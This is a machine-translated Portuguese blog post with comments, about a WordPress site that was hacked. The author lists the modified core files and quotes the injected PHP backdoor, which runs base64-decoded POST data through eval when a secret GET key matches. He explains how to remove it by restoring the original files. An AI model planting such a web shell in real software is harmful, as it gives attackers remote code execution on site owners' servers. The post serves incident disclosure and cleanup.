Got pirateou Again

Postado por: Dexter Panganiban

Você está convidado a ter o meu LIVRE RSS Feeds ou poderá inscrever-me por e-mail para informações mais recentes sobre este site.

Em janeiro passado WordPress.net.in tem injectado códigos no meu Wordpress ficheiros em que os seguintes arquivos WordPress tem sido injectados com números para o SQL

  • wp-admin/admin.php
  • wp-admin/index.php
  • wp-includes/wp-db.php
  • wp-includes/pluggable.php
  • wp-includes/gettext.php
  • wp-includes/default-filters.php

Então novamente. Meu site foi cortado, mas, neste momento, não é totalmente cortado desde que eu era capaz de verificar alguns wordpress arquivos que tenha sido modificado. Ele pode ser facilmente notar se você estiver usando o Windows Live Writer. Se você estiver usando o Windows Live escritor e de repente você encontrar "blog de erro Erro de servidor-servidor-32700 ocorreu parse erro, não foi bem formado"

Vi alguns seqüência como a seguinte:

<? php if ($ _GET [ 'aee8d2759ea2c769']==" e7d557fe37ae8fd6 ") (eval (base64_decode ($ _POST [' arquivo'])); saída;)?>

Esta seqüência não deve ser instalado em qualquer um dos arquivos mencionados acima WordPress e deve ser suprimido. O melhor método de fixação é um presente para substituir ficheiros acima mencionados pelo WordPress arquivos de instalação original que pode ser baixado em seu site. É bom que me deu uma cópia local dos arquivos no meu computador. Porque o que pirateou pode acontecer novamente.

Mais uma vez agradeço gordon.dewis.ca para o seu lugar em relação a este assunto. outras leituras resultado boas informações de outros sites

Minha principal index.php ainda não foi cortado. Eu acreditava que a pirataria não está ainda concluído. A próxima vez que você vê uma mensagem de erro do seu Windows Live escritor. Verifique se o seu WordPress Instalação arquivos.

Fiz Para fazer checklist.

  1. Preciso instalar. Htaccess senha, talvez alguém gostaria de fazer pós em fazê-lo :) ou eu vou ter apenas a pesquisa através do Google.
  2. Investigação para mais segurança possível correção para o meu blog.
  3. Necessidade de actualizar o meu plug-ins :)

É bom que eu estou usando o Windows Live Writer. Então, da próxima vez, quando seu Authoring Tools problema tentar fazer algumas pesquisas no Google imediatamente o problema que se refere. BTW eu preciso para estudar este artigo no WordPress códice.

Email This Post Email This Post

; Arquivado Sob Blogging, Dicas e Truques, Wordpress

Se você é novo aqui, e você gostaria ser actualizadas sobre as coisas acontecer neste local, tente Subscreva ao meu LIVRE RSS Feeds e Subscreva-me por e-mail


Próximo post na categoria: Você precisa fornecer todas as informações? »

«Post anterior na categoria: Link Love # 11: Recolha de Dados de Blogs


Trackback Links

del.icio.us | Digg it | Furl | ma.gnolia | Maple.nu | Netscape | reddit | balde | Shadows | Simpy | Spurl | StumbleUpon | Wink | Yahoo MyWeb |

Permalink: Got pirateou Again


Inscreva-se no PayPal e comece aceitar pagamentos de cartão de crédito imediatamente.

Comentários

Uma resposta a "Got pirateou Again"

  1. KarloPinoyBlogero em 24. De março de 2008 10:58

    Sabe, acho que a razão pela qual o seu blog é cortado frequentemente é porque você divulgar os plugins que você usa no seu blog. Wordpress são os plugins que faz um blog vulneráveis a ataques.

    I'm guessing hackers que só procurou um wordpress plugin que tem algumas questões de segurança e desembarcados no seu blog.

    KarloPinoyBlogero a última postagem do blog .. A Pinoy Prazo para a palavra 'blog'?

    [Responder]


  2. Dexter, em 24. De março de 2008 11:24

    Obrigado pelo conselho Karlo .. De agora em diante não vou divulgar o plug-ins que estou usando .. :)
    Dexter's última postagem no blog .. LG introduziu avançada IPS (In-Painel-Switching) a bordo de amassar

    [Responder]


  3. snoob em 24. de março de 2008 12:27

    lembre-se de chmod os arquivos que você precisa proteger.

    snoob a última postagem no blog ..? Eu realmente quero ganhar dinheiro on-line, o que devo fazer?

    [Responder]


  4. KarloPinoyBlogero em 24. De março de 2008 12:32

    Nenhum problema!

    KarloPinoyBlogero a última postagem do blog .. A Pinoy Prazo para a palavra 'blog'?

    [Responder]


  5. Dexter, em 24. De março de 2008 1:24

    @ Snoob

    qualquer instrução sobre como fazê-lo.

    Dexter's última postagem no blog .. LG introduziu avançada IPS (In-Painel-Switching) a bordo de amassar

    [Responder]


  6. Gordon em 24. De março de 2008 4:20

    @ Dexter: Confira o Codex (http://codex.wordpress.org/Hardening_WordPress). :)
    Gordon's última postagem no blog .. Leaping águia ray mata velejador

    [Responder]


  7. V_RocKs em 24. De março de 2008 5:15

    Isso é papo furado!

    Tenho tanto 2.3.3 e 2.0.11 blogs e todos estão recebendo pirateou desta forma.

    Isto já se arrasta desde outubro de 2007 e tem havido vários novos lançamentos, desde então, sem este problema a ser abordado e não a partir da entrada de autores wordpress!

    Isto é apenas cerca de todas as más notícias ...

    [Responder]


  8. Dexter, em 24. De março de 2008 5:22

    @ V_RocKs

    Qualquer sucesso na prevenção desse truque .. ?

    Dexter's última postagem no blog .. LG introduziu avançada IPS (In-Painel-Switching) a bordo de amassar

    [Responder]


1 pingsLinks para esta postagem

  1. Como no blog? My Top 10 Dicas de Blog: Tech Na Mão dot Net | Filipinas, Blog, SEO & Dicas em 9 junho de 2008 12:26

    [...] Faça uma senha muito forte para evitar a ser cortado. [...]


Deixe uma resposta




Assine o feed RSS

Assine o feed RSS

Digite seu e-mail:

Outros tópicos